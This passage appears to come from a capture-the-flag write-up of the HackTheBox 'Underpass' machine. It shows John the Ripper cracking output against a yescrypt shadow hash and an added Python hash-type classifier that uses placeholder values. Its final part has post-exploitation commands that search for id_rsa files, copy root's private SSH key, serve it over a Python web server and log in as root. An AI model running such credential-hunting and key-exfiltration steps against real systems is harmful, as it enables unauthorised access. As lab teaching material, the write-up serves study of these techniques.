    Loaded 2 password hashes with 2 different salts (crypt, generic crypt(3) [?/64])
    Remaining 1 password hash
    Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
    Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
    Will run 3 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    0g 0:00:00:08 0.00% (ETA: 2025-01-05 10:33) 0g/s 66.28p/s 66.28c/s 66.28C/s evelyn..kelly
    0g 0:00:09:51 0.24% (ETA: 2025-01-05 18:40) 0g/s 71.06p/s 71.06c/s 71.06C/s iloveabby..dragon23
    0g 0:00:17:57 0.46% (ETA: 2025-01-05 16:20) 0g/s 73.24p/s 73.24c/s 73.24C/s ilovenicky..harekrishna
    0g 0:00:20:14 0.54% (ETA: 2025-01-05 14:08) 0g/s 75.65p/s 75.65c/s 75.65C/s peaches15..ninety
    0g 0:00:29:23 0.75% (ETA: 2025-01-05 16:50) 0g/s 72.24p/s 72.24c/s 72.24C/s 190203..151718
    0g 0:00:29:25 0.75% (ETA: 2025-01-05 16:48) 0g/s 72.26p/s 72.26c/s 72.26C/s 130303..12041986
    Session aborted
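    Two hash-identification moments in this box decide which tool is worth running: the 32-hex-digit operator hash from daloRADIUS ("possibly MD5", hashcat -m 0) and the $y$ yescrypt hash from /etc/shadow, which hashcat has no mode for and which john can only attack through its generic crypt(3) format. The following classifier is an added example, not part of the original post; it reads shadow lines, separates lock markers from hashes, and maps the modular-crypt prefix to the algorithm, the john --format name and the hashcat mode. The shadow lines and hashes are constructed placeholders in the right shape, not the box's real values; the raw MD5 sample is the digest of "password".

```python
import re
from typing import Any, Dict, List

# Constructed sample /etc/shadow lines. The hashes are placeholders in the
# right shape (crypt base64 alphabet), not the box's real values.
SAMPLE_SHADOW = """\
root:$y$j9T$SaltSaltSaltSaltSaltSa$HashHashHashHashHashHashHashHashHashHashHash:20057:0:99999:7:::
daemon:*:19103:0:99999:7:::
svcmosh:$6$saltsalt$HashHashHashHashHashHashHashHashHashHashHashHashHashHashHashHashHashHashHashHashHashHash:20057:0:99999:7:::
legacy:$1$abcdefgh$HashHashHashHashHashHa:19103:0:99999:7:::
parked:!$6$saltsalt$HashHashHashHashHashHashHashHashHashHashHashHashHashHashHashHashHashHashHashHashHashHash:19103:0:99999:7:::
"""

# Constructed: unsalted MD5 of "password", the shape of the daloRADIUS
# operator hash discussed earlier.
SAMPLE_RAW_MD5 = "5f4dcc3b5aa765d61d8327deb882cf99"

# crypt(3) prefix -> (algorithm, john --format, hashcat -m). yescrypt has no
# hashcat mode, so john's generic 'crypt' format is the fallback; that format
# calls the system crypt(3) for every guess, which is why it is slow.
CRYPT_PREFIXES = {
    "$1$": ("md5crypt", "md5crypt", 500),
    "$2a$": ("bcrypt", "bcrypt", 3200),
    "$2b$": ("bcrypt", "bcrypt", 3200),
    "$2y$": ("bcrypt", "bcrypt", 3200),
    "$5$": ("sha256crypt", "sha256crypt", 7400),
    "$6$": ("sha512crypt", "sha512crypt", 1800),
    "$y$": ("yescrypt", "crypt", None),
}
RAW_32HEX_RE = re.compile(r"[0-9a-fA-F]{32}")
B64_RE = re.compile(r"[./A-Za-z0-9]+")


def classify(h: str) -> Dict[str, Any]:
    """Identify a password hash by its format; fields stay None when unknown."""
    result = {"algorithm": None, "john_format": None, "hashcat_mode": None, "note": ""}
    for prefix, (algo, john, hc) in CRYPT_PREFIXES.items():
        if h.startswith(prefix):
            fields = h[len(prefix):].split("$")
            # modular crypt format: optional parameters, salt, hash; each
            # field is drawn from the crypt base64 alphabet
            if fields and all(B64_RE.fullmatch(f) for f in fields):
                result.update(algorithm=algo, john_format=john, hashcat_mode=hc)
                if hc is None:
                    result["note"] = "no hashcat mode; john falls back to generic crypt(3)"
            return result
    if RAW_32HEX_RE.fullmatch(h):
        result.update(algorithm="MD5 (raw, unsalted)", john_format="Raw-MD5", hashcat_mode=0,
                      note="32 hex digits is only 'possibly' MD5: NTLM (-m 1000) and MD4 (-m 900) look the same")
    return result


def parse_shadow(text: str) -> List[Dict[str, Any]]:
    """Split shadow lines into user / hash / lock state and classify each hash."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or ":" not in line:
            continue
        user, field = line.split(":")[:2]
        locked = field.startswith(("!", "*"))
        hash_part = field.lstrip("!")  # "!$6$..." means disabled, hash retained
        if hash_part in ("", "*"):
            hash_part = None
        row = {"user": user, "locked": locked, "hash": hash_part}
        row.update(classify(hash_part or ""))
        rows.append(row)
    return rows


if __name__ == "__main__":
    for r in parse_shadow(SAMPLE_SHADOW):
        print(f"{r['user']:8} locked={r['locked']!s:5} {r['algorithm']} "
              f"john={r['john_format']} hashcat={r['hashcat_mode']} {r['note']}")
    print(classify(SAMPLE_RAW_MD5))
```

    The john output above confirms the slow path: "Cost 1 (algorithm [...]) is 0 for all loaded hashes" means the generic crypt format matched none of its known fast algorithms and is round-tripping every candidate through libc, and yescrypt is deliberately expensive on top of that. A few hundred guesses per second against rockyou is a multi-day job, which is exactly the trade-off yescrypt is meant to impose on an attacker who already holds the shadow file.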

    SSH Private Key

    id_rsa

    I found an SSH private key (id_rsa) in the /root/.ssh directory and copied it to the current directory. Next, I spun up a Python web server in the same directory:

    root@underpass:~# find / -name id_rsa 2> /dev/null
    /home/svcMosh/.ssh/id_rsa
    /root/.ssh/id_rsa
    root@underpass:~# cp /root/.ssh/id_rsa .
    root@underpass:~# ls
    id_rsa  root.txt
    root@underpass:~# python3 -m http.server 
    Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
    

    I transferred it to my own machine:

    Shell Access via SSH

    croc@hacker$ sudo ssh -i id_rsa root@10.10.11.48     
    Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/pro
    
     System information as of Fri Jan  3 04:32:04 AM UTC 2025
    
      System load:  0.05              Processes:             233
      Usage of /:   85.7% of 3.75GB   Users logged in:       2
      Memory usage: 15%               IPv4 address for eth0: 10.10.11.48
      Swap usage:   0%
    
      => / is using 85.7% of 3.75GB
    
    
    Expanded Security Maintenance for Applications is not enabled.
    
    0 updates can be applied immediately.
    
    Enable ESM Apps to receive additional future security updates.
    See https://ubuntu.com/esm or run: sudo pro status
    
    
    The list of available updates is more than a week old.
    To check for new updates run: sudo apt update
    Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
    
    
    Last login: Thu Dec 19 13:40:29 2024
    root@underpass:~# 
